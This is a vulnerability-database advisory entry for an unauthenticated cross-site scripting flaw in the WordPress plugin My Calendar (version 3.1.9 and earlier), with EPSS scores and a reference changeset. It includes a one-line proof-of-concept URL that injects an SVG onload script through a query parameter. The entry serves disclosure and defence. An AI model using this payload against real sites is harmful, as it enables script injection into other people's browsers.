Lucene search

K

Joe DolsonWPVDB-ID:DBF334CE-C8F5-4380-B8EC-49703B386C8F

HistoryApr 30, 2019 - 12:00 a.m.

My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS)

2019-04-3000:00:00

Joe Dolson

wpscan.com

8

EPSS

0.001

Percentile

41.8%

Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.

PoC

http://www.domain.de/?rsd='><svg%2Fonload%3Dconfirm(%2FOPENBUGBOUNTY%2F)>

References

plugins.trac.wordpress.org/changeset/2078031/my-calendar

EPSS

0.001

Percentile

41.8%

Related for WPVDB-ID:DBF334CE-C8F5-4380-B8EC-49703B386C8F

cvelist1 nuclei1 prion1 cve1 openvas1 wpexploit1 nvd1